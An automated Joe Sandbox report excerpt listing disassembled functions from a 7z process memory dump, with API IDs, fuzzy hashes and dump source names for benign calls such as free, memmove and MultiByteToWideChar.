                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: fputs$free
                                                                                                                                                                                                                                                                            • String ID: Open archive: $StdOut
                                                                                                                                                                                                                                                                            • API String ID: 3873070119-2401103298
                                                                                                                                                                                                                                                                            • Opcode ID: 5c408db9bf12223247ae41b3a4b257e588f5b2f357ad56df3248e673553bd93f
                                                                                                                                                                                                                                                                            • Instruction ID: 5d6fe0aa528c13010b92a0cbe3e9f833486a26d09b1dfff1e97b6a4975047452
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5c408db9bf12223247ae41b3a4b257e588f5b2f357ad56df3248e673553bd93f
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FFF03AE6701C8581CF41AF26DAA53AD2323EB85FD4F48D432CE0E5B318EF29C8998711
                                                                                                                                                                                                                                                                            Function 006A2344 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 23COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: fputs$fputc
                                                                                                                                                                                                                                                                            • String ID: $:
                                                                                                                                                                                                                                                                            • API String ID: 1185151155-4041779174
                                                                                                                                                                                                                                                                            • Opcode ID: 0876c551c5b7590e0ff57701a7544b73fa63f79d82255e9a5707c5629e0c0e90
                                                                                                                                                                                                                                                                            • Instruction ID: 20a2d1ff37060ee026e29c12791ed6d774c14f440cad4d96fd45c53f2973b4e7
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0876c551c5b7590e0ff57701a7544b73fa63f79d82255e9a5707c5629e0c0e90
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 74E06D96304A8085CF11AB66E86435D6322FB9AFCCF488122EE8E17719DE2CC108CB12
                                                                                                                                                                                                                                                                            Function 006AD4C0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: AddressHandleModuleProc
                                                                                                                                                                                                                                                                            • String ID: GetLargePageMinimum$kernel32.dll
                                                                                                                                                                                                                                                                            • API String ID: 1646373207-2515562745
                                                                                                                                                                                                                                                                            • Opcode ID: 9cafdcdec884bdbcba65c699ecbd7ef866ca1a9750535094873ebbbe4fc89029
                                                                                                                                                                                                                                                                            • Instruction ID: 97d0517305811d0a39b27c0c6fbbfb8ebb45a1d75d2941799724d955230e4f63
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9cafdcdec884bdbcba65c699ecbd7ef866ca1a9750535094873ebbbe4fc89029
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0BE04624752B0191FE08EB90FC943A82362AF8AB44F840439C50E92320EF3EC669CB12
                                                                                                                                                                                                                                                                            Function 006971BC Relevance: 6.5, APIs: 5, Instructions: 203COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: free$ErrorLast
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 408039514-0
                                                                                                                                                                                                                                                                            • Opcode ID: d7c40869ad587d79d1a4cde6791f56a7827730960875fe2f1716f54cae6806b2
                                                                                                                                                                                                                                                                            • Instruction ID: b9e94349256bd7a2a1a39f3585a40841aa60e1739cffeb09b8084243cd8e9800
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d7c40869ad587d79d1a4cde6791f56a7827730960875fe2f1716f54cae6806b2
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0D817972329A4082CF64DF25D45075EB7AAF789BA4F544225EF9E43B68EF38C951C700
                                                                                                                                                                                                                                                                            Function 00674210 Relevance: 6.4, APIs: 5, Instructions: 126COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 735d4e83ff881ba3abcc4a6c9aa5d61f64a5c4c51b6bddb4a0ec876fb6e64911
                                                                                                                                                                                                                                                                            • Instruction ID: faf0515a3be48a7b92942cf7c2036d18347ed15c3771557c22f13b83348ccad2
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 735d4e83ff881ba3abcc4a6c9aa5d61f64a5c4c51b6bddb4a0ec876fb6e64911
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FE412663315B8096CB20DE22D5542AE6762FB86BE4F088215FFAD07B59DF38C556C700
                                                                                                                                                                                                                                                                            Function 00694C2C Relevance: 6.4, APIs: 5, Instructions: 114COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: free$memmove
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1534225298-0
                                                                                                                                                                                                                                                                            • Opcode ID: 2d6c9dfe1155a16f3a068d7370a8ec758800c3918b65cbcdfef43df97f9f1dc5
                                                                                                                                                                                                                                                                            • Instruction ID: 9304aef75d6a3fbc988200d979df2dfe5448eb285a423eb797eb6a8816795962
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2d6c9dfe1155a16f3a068d7370a8ec758800c3918b65cbcdfef43df97f9f1dc5
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7D41E92720C6C095CB20DA25E44059FAFA6F7C7798F180218EB9607F99CB7EC09ACB11
                                                                                                                                                                                                                                                                            Function 0069F4AC Relevance: 6.3, APIs: 5, Instructions: 91COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: free$ErrorLastmemmove
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 3561842085-0
                                                                                                                                                                                                                                                                            • Opcode ID: 835e30b8a2ce9afd242e3c27a4bd6d2521a716217a04de116505d45ba31023b0
                                                                                                                                                                                                                                                                            • Instruction ID: cc47ff2e2a186adbb64fcdbacb5e1317e3a1351194a0628f2585301226271802
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 835e30b8a2ce9afd242e3c27a4bd6d2521a716217a04de116505d45ba31023b0
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B731A472214A4181CF50DF24E45025EB376FB99BA4F445225FB9E87BA9DF38C546CB04
                                                                                                                                                                                                                                                                            Function 0066EF70 Relevance: 6.3, APIs: 5, Instructions: 91COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: free$memmove
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1534225298-0
                                                                                                                                                                                                                                                                            • Opcode ID: 9a39179057fc4b698db1469c34720306d33abb4d3d1416dbc86e8f68b6a95521
                                                                                                                                                                                                                                                                            • Instruction ID: 73042977396faf4a27a5d01e87a504dd8ad401f51d49afa2a6a13f7b919da3b9
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9a39179057fc4b698db1469c34720306d33abb4d3d1416dbc86e8f68b6a95521
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3A21AE72711B859BCB10EF56E9A4269B322F745BE4B088139EF2907795DF34D862C300
                                                                                                                                                                                                                                                                            Function 0066C790 Relevance: 6.3, APIs: 5, Instructions: 62COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: memcmp
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1475443563-0
                                                                                                                                                                                                                                                                            • Opcode ID: 712599938bbeffd81504be00bb0ea2eb8721062aa4075a36f0ea6c542d0c478b
                                                                                                                                                                                                                                                                            • Instruction ID: 72ec4f1b9d0d33cf60e37192fb3274404cf239430b24ddee09cb04e42240c959
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 712599938bbeffd81504be00bb0ea2eb8721062aa4075a36f0ea6c542d0c478b
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4311A3E2304B5195EB14AF2AD8513B83627975AFE4F849029DE4987305EF38CDA6C708
                                                                                                                                                                                                                                                                            Function 00663BE4 Relevance: 6.3, APIs: 5, Instructions: 61COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,FFFFFFFF), ref: 00663C2A
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,FFFFFFFF), ref: 00663C36
                                                                                                                                                                                                                                                                            • _CxxThrowException.MSVCRT ref: 00663C54
                                                                                                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,FFFFFFFF), ref: 00663C80
                                                                                                                                                                                                                                                                            • _CxxThrowException.MSVCRT ref: 00663C9E
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ByteCharExceptionMultiThrowWide$ErrorLast
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 2296236218-0
                                                                                                                                                                                                                                                                            • Opcode ID: 970d5cdc5d485172c45e5e67665dade64923c0f4ace1f899d0aee1bf120422e8
                                                                                                                                                                                                                                                                            • Instruction ID: 13e7f7338335c46a176593018ac859f11693d469da2aec3c308516b20d1479fa
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 970d5cdc5d485172c45e5e67665dade64923c0f4ace1f899d0aee1bf120422e8
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0221D572300B4886DB10DF56E85075DB7A2FB89F88F448129EA8997724EF39C855CB01
                                                                                                                                                                                                                                                                            Function 0066182C Relevance: 6.3, APIs: 5, Instructions: 49COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: free
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1294909896-0
                                                                                                                                                                                                                                                                            • Opcode ID: bfe4f0f55ee913568f211c4fbf308b9aee0fbd2fe155706c5642a99402e277d4
                                                                                                                                                                                                                                                                            • Instruction ID: afc96192a320626940da3d4d47e9baf4f1753645e472e30b547b438bff00437d
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: bfe4f0f55ee913568f211c4fbf308b9aee0fbd2fe155706c5642a99402e277d4
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F001C033702E4596DB24EF26D8201A9A321F783FA4B1C4325AF2D2BBD0CF24C8128344
                                                                                                                                                                                                                                                                            Function 00683864 Relevance: 6.3, APIs: 5, Instructions: 40COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • free.MSVCRT ref: 00683877
                                                                                                                                                                                                                                                                              • Part of subcall function 00680BBC: free.MSVCRT ref: 00680BCC
                                                                                                                                                                                                                                                                              • Part of subcall function 00680BBC: free.MSVCRT ref: 00680BD5
                                                                                                                                                                                                                                                                              • Part of subcall function 00680BBC: free.MSVCRT ref: 00680C00
                                                                                                                                                                                                                                                                              • Part of subcall function 00680BBC: free.MSVCRT ref: 00680C08
                                                                                                                                                                                                                                                                              • Part of subcall function 00681474: free.MSVCRT ref: 006814A6
                                                                                                                                                                                                                                                                              • Part of subcall function 00681474: free.MSVCRT ref: 006814AF
                                                                                                                                                                                                                                                                              • Part of subcall function 00681474: free.MSVCRT ref: 006814B8
                                                                                                                                                                                                                                                                              • Part of subcall function 00681474: free.MSVCRT ref: 006814C0
                                                                                                                                                                                                                                                                            • free.MSVCRT ref: 00683892
                                                                                                                                                                                                                                                                            • free.MSVCRT ref: 0068389B
                                                                                                                                                                                                                                                                            • free.MSVCRT ref: 006838C6
                                                                                                                                                                                                                                                                            • free.MSVCRT ref: 006838CE
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: free
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1294909896-0
                                                                                                                                                                                                                                                                            • Opcode ID: 18ccfc5564c15e61a23e9604fa5b251626cea37ac211422c809096770ce5a63d
                                                                                                                                                                                                                                                                            • Instruction ID: 39bfbe59192662b2a15b82376711d0c54bbf59c5bddd2b29b49fbf26d0e6c488
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 18ccfc5564c15e61a23e9604fa5b251626cea37ac211422c809096770ce5a63d
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 88F0A4B3B16C5096CB55FF26DDA11AC6322FB87F9070C0266AF1D5B791DF10C9628344
                                                                                                                                                                                                                                                                            Function 0068C9CC Relevance: 6.3, APIs: 5, Instructions: 36COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: free
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1294909896-0
                                                                                                                                                                                                                                                                            • Opcode ID: c213d67050506c93901002ddd1084c0dd65243c9eb9d617befeb87ee319482a8
                                                                                                                                                                                                                                                                            • Instruction ID: 6cf9bc768aab901f48526681691b50d078409c90fade124b9f4fed6d46e51e3d
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c213d67050506c93901002ddd1084c0dd65243c9eb9d617befeb87ee319482a8
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 28F090A3705D9589CB60FE27DCA11A8A321AF97BE871C4275FF1E17794EE20C8538314
                                                                                                                                                                                                                                                                            Function 0068CA3C Relevance: 6.3, APIs: 5, Instructions: 36COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: free
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1294909896-0
                                                                                                                                                                                                                                                                            • Opcode ID: f7456f4712a6592163503973d257ef0995b2ed4d21bfa0f5baa221aafdf9fe8c
                                                                                                                                                                                                                                                                            • Instruction ID: a7bed230acbcca0769c4f625833ce91cd9bae943974d6471db7bfb2d259ea529
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f7456f4712a6592163503973d257ef0995b2ed4d21bfa0f5baa221aafdf9fe8c
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 28F0F0A37019858ECB54FE26DCA12A8A321AF46BA8B0C4235BF2D17784DE30C8828314
                                                                                                                                                                                                                                                                            Function 00672A84 Relevance: 6.3, APIs: 5, Instructions: 36COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: free
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1294909896-0
                                                                                                                                                                                                                                                                            • Opcode ID: 99aac3ebba39b973ad56ba9f7cc64fb651a8512a5e29eea15e4582f1b066fd79
                                                                                                                                                                                                                                                                            • Instruction ID: 44da597bbc8bce6d7c83e5234a1aed848c01d21b136abc81a8d045d6422d1a60
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 99aac3ebba39b973ad56ba9f7cc64fb651a8512a5e29eea15e4582f1b066fd79
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FFF0B473715C4589CB65EE36DC71168A322EBD7FD47294169AF2D2B399DE30CC428344
                                                                                                                                                                                                                                                                            Function 006A7690 Relevance: 6.3, APIs: 5, Instructions: 22COMMON
